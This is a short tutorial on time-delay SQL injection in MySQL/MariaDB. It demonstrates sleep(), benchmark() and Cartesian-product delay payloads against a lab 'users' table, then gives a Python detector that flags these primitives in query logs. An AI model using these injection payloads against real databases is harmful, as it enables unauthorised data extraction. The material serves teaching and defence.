MySQL: Time-Delay Injection

1.sleep()

MariaDB [security]> select * from users where id = 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)

MariaDB [security]> select * from users where id = 1 and sleep(5);
Empty set (5.00 sec)

MariaDB [security]>

2.benchmark()

BENCHMARK(count,expr)
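The BENCHMARK() function executes the expression expr repeatedly, count times. It can be used to time how quickly MySQL processes the expression. The result value is always 0.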

MariaDB [security]> select benchmark(1000000,sha(1));
+---------------------------+
| benchmark(1000000,sha(1)) |
+---------------------------+
| 0 |
+---------------------------+
1 row in set (0.29 sec)

MariaDB [security]> select benchmark(10000000,sha(1));
+----------------------------+
| benchmark(10000000,sha(1)) |
+----------------------------+
| 0 |
+----------------------------+
1 row in set (2.81 sec)

MariaDB [security]> select benchmark(100000000,sha(1));
+-----------------------------+
| benchmark(100000000,sha(1)) |
+-----------------------------+
| 0 |
+-----------------------------+
1 row in set (28.73 sec)

MariaDB [security]> select * from users where id = 1 and benchmark(10000000,sha(1));
Empty set (14.46 sec)

MariaDB [security]>

3.Cartesian product

select if(1=1,(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0);
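
From the defender's side, the three delay primitives shown above (sleep(), a large benchmark() count, and a comma join of information_schema tables) can be flagged in a query log. The following is an added example, not part of the original page; the log format (query time in seconds, a tab, then the statement), the sample lines and the BENCH_MIN_COUNT threshold are assumptions made for illustration.

```python
import re

_SLEEP = re.compile(r"\bsleep\s*\(", re.I)
_BENCH = re.compile(r"\bbenchmark\s*\(\s*(\d+)\s*,", re.I)
# Two or more information_schema tables comma-joined in one FROM clause.
_CROSS = re.compile(
    r"\bfrom\s+information_schema\.\w+(?:\s+(?:as\s+)?\w+)?"
    r"(?:\s*,\s*information_schema\.\w+(?:\s+(?:as\s+)?\w+)?)+", re.I)

BENCH_MIN_COUNT = 100_000  # assumed threshold; tune per environment


def classify(sql):
    """Return the list of delay primitives found in one SQL statement."""
    hits = []
    if _SLEEP.search(sql):
        hits.append("sleep")
    # Small benchmark() counts finish instantly, so only large ones are flagged.
    if any(int(m.group(1)) >= BENCH_MIN_COUNT for m in _BENCH.finditer(sql)):
        hits.append("benchmark")
    if _CROSS.search(sql):
        hits.append("cartesian")
    return hits


def scan(lines):
    """Yield (seconds, hits, sql) for 'seconds<TAB>sql' log lines that match."""
    for line in lines:
        secs, _, sql = line.rstrip("\n").partition("\t")
        hits = classify(sql)
        if hits:
            yield float(secs), hits, sql


# Constructed sample input: query time in seconds, a tab, then the statement.
SAMPLE_LOG = [
    "0.00\tselect * from users where id = 1",
    "5.00\tselect * from users where id = 1 and sleep(5)",
    "14.46\tselect * from users where id = 1 and benchmark(10000000,sha(1))",
    "9.10\tselect if(1=1,(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),0)",
    "5.00\tSELECT * FROM users WHERE id = 1 AND SLEEP (5)",
    "0.00\tselect benchmark(10,sha(1))",
]

if __name__ == "__main__":
    for secs, hits, sql in scan(SAMPLE_LOG):
        print(f"{secs:6.2f}s {','.join(hits):10} {sql}")
```

Matching on the statement text rather than on elapsed time alone also catches attempts where the delay was short, and leaves ordinary slow queries unflagged.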